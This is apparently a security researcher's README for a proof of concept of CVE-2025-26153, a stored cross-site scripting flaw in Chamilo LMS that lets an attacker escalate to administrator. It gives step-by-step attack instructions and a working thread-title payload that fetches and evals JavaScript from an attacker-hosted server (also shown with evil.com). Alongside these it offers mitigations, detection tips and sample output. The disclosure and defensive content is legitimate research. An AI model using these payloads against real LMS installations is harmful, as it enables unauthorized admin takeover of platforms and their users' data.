# Chamilo LMS (<= v2.0) - Stored XSS to Privilege Escalation POC [CVE-2025-26153]

## Overview

This repository contains a proof of concept demonstrating a **stored cross-site scripting (XSS) vulnerability** in Chamilo LMS that can be exploited to achieve **privilege escalation** from a regular user to platform administrator.
This vulnerability is indexed and patched: https://nvd.nist.gov/vuln/detail/CVE-2025-26153  

## Vulnerability Details

### **CVE Information**
- **Application**: Chamilo LMS <= v2.0
- **Vulnerability Type**: Stored XSS leading to Privilege Escalation


### **Technical Details**

**Vulnerable Code Locations:**
1. `/public/main/forum/forumqualify.php` - Line 277
   ```php
   $form->addLabel(get_lang('Thread'), $threadEntity->getTitle());
   ```

2. `/public/main/forum/viewforum.php` - Line 369
   ```php
   .$thread->getTitle().'</a>';
   ```

3. There are more!

**Root Cause:**
- Forum thread titles are stored without proper sanitization
- Thread titles are displayed without HTML escaping in multiple locations
- No Content Security Policy (CSP) preventing XSS execution

## Step-by-Step Privilege Escalation Guide

### **Phase 1: Data Gathering**

**Step 1: Gather Target User Information**
1. Login to Chamilo LMS
2. Navigate to `Social Network` -> `Personal Data`
3. Open `user_info` and note the following information:
   - User ID
   - Username
   - Firstname
   - Lastname
   - Email address

**Step 2: Generate Custom Payload**
1. Execute the payload generator:
   ```bash
   python generate_payload.py
   ```
2. Input the target User ID from Step 1
3. Input the description information you don't want changed (or specify new values)
4. The script will generate a customized `payload.js` file

**Step 3: Host Payload Externally**
1. Upload the generated `payload.js` to a public hosting service:
   - GitHub Gist (recommended)
   - GitHub Pages
   - Your own web server
2. Note the direct URL to the payload file

### **Phase 2: XSS Injection and Execution**

**Step 4: Access Social Groups**
1. Login to Chamilo LMS (can be with any user account)
2. Navigate to `Social Network` -> `Social groups`

**Step 5: Join or Create Social Group**
1. Join an existing social group, or
2. Create a new social group if needed

**Step 6: Deploy XSS Payload**
1. Create a new thread in the social group
2. In the thread title field, input the following XSS payload:
   ```html
   <img src=x onerror="var x=new XMLHttpRequest();x.open('GET','//YOUR-HOST-SERVER/payload.js');x.onload=()=>eval(x.responseText);x.send()">
   ```
3. Replace `YOUR-HOST-SERVER` with your actual hosting URL
4. Submit the thread

**Step 7: Trigger Privilege Escalation**
1. Wait for a user with admin privileges to view the social group
2. When the admin views the malicious thread, the XSS payload executes automatically in the background
3. The privilege escalation does NOT occur silently - the admin will be redirected to the user list
4. The specified target user will be promoted to platform administrator without any visible indication


### **Phase 3: Verification**

**Step 8: Confirm Privilege Escalation**
1. Login as the target user
2. Check if admin privileges have been granted
3. Verify access to administrative functions

### **Payload Generator Usage**
The `generate_payload.py` script allows customization of the privilege escalation attack:

**Input Parameters:**
- Target User ID
- New username 
- New password (optional)
- Official code
- Email address
- First name, last name, phone (optional)

## Example Attack Flow

```
1. Attacker creates malicious forum thread
   └── Title: <script src=//evil.com/payload.js></script>

2. Admin user browses forum and views thread
   └── Browser loads and executes external JavaScript

3. Payload creates hidden form with privilege escalation data
   └── Targets specific User ID for promotion to admin

4. Form auto-submits via CSRF attack
   └── Uses admin's session cookies automatically

5. Target user becomes platform administrator
   └── Attacker gains full platform control
```

## Mitigation Strategies

### **Immediate Fixes**
1. **Input Sanitization**
   ```php
   // Before
   $threadEntity->getTitle()
   
   // After  
   htmlspecialchars($threadEntity->getTitle(), ENT_QUOTES, 'UTF-8')
   ```

2. **Output Encoding**
   ```twig
   <!-- Before -->
   {{ thread.title }}
   
   <!-- After -->
   {{ thread.title|escape }}
   ```

3. **Content Security Policy**
   ```http
   Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
   ```

### **Long-term Solutions**
- Implement comprehensive input validation framework
- Regular security code reviews
- Automated security testing in CI/CD pipeline
- Security training for development team

## Detection & Monitoring

### **Log Analysis**
Monitor for:
- Unusual admin user creations/modifications
- Suspicious forum thread titles containing HTML/JavaScript
- External script loading from untrusted domains


## Legal Disclaimer

 **IMPORTANT LEGAL NOTICE**

This proof of concept is provided for **educational and authorized security testing purposes only**. 

- Only use against systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal in most jurisdictions
- This research is intended to help organizations improve their security posture
- The authors are not responsible for any misuse of this information

## Research Credits

**Discovery & Analysis:** US Cyber Combine 

**Testing Environment:** USCG CTF Environment

**Console Output from Successful Attack:**
```
XSS Payload loaded successfully!
Target User ID: 9
Current location: http://cve-hunting.ctf.uscybergames.com:8000/resources/usergroups/show/5
Form created with action: http://cve-hunting.ctf.uscybergames.com:8000/main/admin/user_edit.php?user_id=9
Submitting privilege escalation form for user_id 9
Form has 66 fields
Form submission triggered!
Fetch response status: 200
```

---
